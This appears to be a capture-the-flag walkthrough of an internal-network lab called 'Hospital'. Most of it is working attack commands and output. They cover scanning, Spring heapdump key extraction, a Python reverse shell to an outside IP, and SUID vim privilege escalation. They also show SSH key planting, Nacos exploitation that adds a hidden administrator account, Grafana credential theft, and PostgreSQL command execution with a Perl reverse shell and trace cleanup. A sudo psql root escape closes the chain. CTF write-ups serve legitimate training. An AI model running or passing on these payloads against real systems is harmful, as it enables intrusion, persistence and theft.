Hospital

Entry point: 39.98.121.23

flag1

fscan scan

./fscan -h 39.98.121.23

[+] Port open 39.98.121.23:22
[+] Port open 39.98.121.23:8080
[*] Web title http://39.98.121.23:8080 status: 302 length: 0 title: (none) redirect: http://39.98.121.23:8080/login;jsessionid=BD627BA7D464DDFEED3CED6DFACF24BF
[*] Web title http://39.98.121.23:8080/login;jsessionid=BD627BA7D464DDFEED3CED6DFACF24BF status: 200 length: 2005 title: Medical Management Backend
[+] [Vulnerability found] target: http://39.98.121.23:8080
Type: poc-yaml-spring-actuator-heapdump-file
Name:
Details: %!s(<nil>)

Request /actuator/heapdump to download the heap dump, then pull the interesting values out of it:

java -jar .\JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump


algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

An AES key in CBC mode sitting in the heap like this is what a Shiro-style rememberMe cookie is encrypted with; feed it to an exploit tool and let the tool do the rest.


Connect with AntSword (蚁剑)


Reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.134.149.24",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'


Upgrade to a TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'


vim.basic carries the SUID bit on this box (the same thing the privilege escalation below relies on), so it can open files under /root even from the web user:

vim.basic /root/flag/flag01.txt


flag2

Privilege escalation to root via SUID vim.basic

/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'


echo "ssh-rsa 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" > /root/.ssh/authorized_keys

(A single > replaces whatever keys were already in the file; use >> if you want to keep them.)


Upload venom and fscan


ifconfig


Scan the internal network and set up the proxy

./fscan -h 172.30.12.5/24

[+] Port open 172.30.12.6:8848
[+] Port open 172.30.12.236:22
[+] Port open 172.30.12.5:22
[+] Port open 172.30.12.6:139
[+] Port open 172.30.12.6:135
[+] Port open 172.30.12.6:445
[+] Port open 172.30.12.236:8080
[+] Port open 172.30.12.5:8080
[+] Port open 172.30.12.236:8009
[*] Web title http://172.30.12.5:8080 status: 302 length: 0 title: (none) redirect: http://172.30.12.5:8080/login;jsessionid=7045AE14140EF41E377989154BC69120
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] Web title http://172.30.12.5:8080/login;jsessionid=7045AE14140EF41E377989154BC69120 status: 200 length: 2005 title: Medical Management Backend
[*] NetInfo
[*] 172.30.12.6
[->] Server02
[->] 172.30.12.6
[*] Web title http://172.30.12.236:8080 status: 200 length: 3964 title: Hospital Backend Management Platform
[*] Web title http://172.30.12.6:8848 status: 404 length: 431 title: HTTP Status 404 – Not Found
[+] [Vulnerability found] target: http://172.30.12.6:8848
Type: poc-yaml-alibaba-nacos
Name:
Details: %!s(<nil>)
[+] [Vulnerability found] target: http://172.30.12.5:8080
Type: poc-yaml-spring-actuator-heapdump-file
Name:
Details: %!s(<nil>)
[+] [Vulnerability found] target: http://172.30.12.6:8848
Type: poc-yaml-alibaba-nacos-v1-auth-bypass
Name:
Details: %!s(<nil>)

Hit Nacos first: the default credentials nacos:nacos log in.


The configuration list contains data-id: db-config


Generate the malicious jar with the tool below:

charonlight/NacosExploitGUI: an all-in-one Nacos exploitation GUI that bundles detection and exploitation of the default-credential, SQL injection, authentication bypass and deserialization vulnerabilities

Edit AwesomeScriptEngineFactory.java so that it runs the two commands below. Runtime.exec returns without waiting, so the commands are launched back to back; if the group add ever fails because the user does not exist yet, call waitFor() on the first process before starting the second.

Runtime.getRuntime().exec("net user Tsuki pass@123 /add");
Runtime.getRuntime().exec("net localgroup administrators Tsuki /add");


Run this to build the jar


Copy the jar to the web1 server and serve it from there over HTTP.


Then connect over RDP with the account the payload created (Tsuki / pass@123).


flag3

The Burp extension https://github.com/amaz1ngday/fastjson-exp does the job directly: use its fastjson echo to read the flag.


Leave a backdoor and connect to it.


flag4


This host is multi-homed, so upload fscan and venom here too and scan the 172.30.54.0/24 subnet:

./fscan -h 172.30.54.179/24

[+] Port open 172.30.54.12:22
[+] Port open 172.30.54.179:22
[+] Port open 172.30.54.12:5432
[+] Port open 172.30.54.12:3000
[+] Port open 172.30.54.179:8080
[+] Port open 172.30.54.179:8009
[*] Web title http://172.30.54.179:8080 status: 200 length: 3964 title: Hospital Backend Management Platform
[*] Web title http://172.30.54.12:3000 status: 302 length: 29 title: (none) redirect: http://172.30.54.12:3000/login
[*] Web title http://172.30.54.12:3000/login status: 200 length: 27909 title: Grafana

./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000

It dumps the database credentials postgres:Postgres@123


The privilege escalation later connects to the database as the role root, so give that role a known password now:

ALTER USER root WITH PASSWORD '123456';

Create a command-execution function (needs superuser, which postgres is; note that PostgreSQL 8.2 and later refuse to load a library without a PG_MODULE_MAGIC block, so on a current server this CREATE FUNCTION fails with "missing magic block" and COPY ... FROM PROGRAM is the fallback):

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

The shell command is dollar-quoted: with standard_conforming_strings on, \' is not an escape inside a normal string, so the perl one-liner's own single quotes would otherwise terminate the SQL string.

select system($cmd$perl -e 'use Socket;$i="172.30.54.179";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'$cmd$);
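The full sequence a practitioner would run at this point, written as an added example (not the writeup's own commands): check that the session really is superuser, try COPY ... FROM PROGRAM first because it works on any PostgreSQL 9.3+ without loading a library, fall back to the libc system() function where the server still accepts it, fire the reverse shell with dollar quoting, and drop the artifacts afterwards. The listener 172.30.54.179:2222 is taken from the writeup; the table name cmd_out and the libc path are assumptions.

```sql
-- Added example, not part of the original writeup.
-- 1. Both routes below need superuser (COPY FROM PROGRAM also accepts a member of
--    pg_execute_server_program). is_superuser reads 'on' when we have it.
SELECT current_user, current_setting('is_superuser') AS superuser, version();

-- 2. Route A: COPY ... FROM PROGRAM (PostgreSQL 9.3+). stdout of the command is
--    captured into the table, which doubles as a quick execution check.
CREATE TEMP TABLE cmd_out (line text);          -- name assumed
COPY cmd_out FROM PROGRAM 'id';
SELECT * FROM cmd_out;

-- 3. Route B: libc system() exposed as a C-language function. Servers since 8.2
--    reject a library without PG_MODULE_MAGIC ("missing magic block"); if that
--    error appears, stay with route A.
CREATE OR REPLACE FUNCTION system(cstring) RETURNS integer
  AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE c STRICT;  -- path assumed
SELECT system('id > /tmp/.pg_check');           -- returns the shell exit status

-- 4. Reverse shell. $cmd$...$cmd$ keeps the one-liner's quotes intact, and the
--    trailing & backgrounds it so COPY/system() return instead of hanging the
--    connection until the shell exits.
COPY cmd_out FROM PROGRAM $cmd$perl -e 'use Socket;$i="172.30.54.179";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' &$cmd$;
-- or, if route B loaded:
-- SELECT system($cmd$perl -e '...same one-liner...' &$cmd$);

-- 5. Clean up what we left in the catalog.
DROP FUNCTION IF EXISTS system(cstring);
DROP TABLE IF EXISTS cmd_out;
```

Route A is usually the better first choice on a modern server; the function in route B only loads on old builds or ones that have been patched to skip the magic-block check.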


The shell comes back; upgrade it to an interactive one:

python3 -c 'import pty;pty.spawn("/bin/bash")'


sudo -l shows that psql may be run through sudo without a password.
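What the screenshots that followed most likely show, as an added example rather than the writeup's own commands: psql's \! meta-command runs a shell with the privileges psql itself has, so a sudo rule for psql is a root shell. psql only reaches its prompt after connecting, and the password set for the root role earlier (123456) is assumed to be what it asks for.

```sql
-- Added example, not part of the original writeup.
-- From the unprivileged shell (password set earlier with ALTER USER root ...):
--   $ sudo psql -U root -d postgres
-- At the postgres=# prompt, \! hands the line to /bin/sh as the calling euid:
\! id                 -- expect uid=0(root) because psql is running under sudo
\! /bin/bash -p       -- full root shell; /root/flag/* is readable from here
```

The same escape works from \? (the help pager) on systems where the pager is less, but \! is direct and needs no pager at all.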


That gives a root shell, and with it the flag.
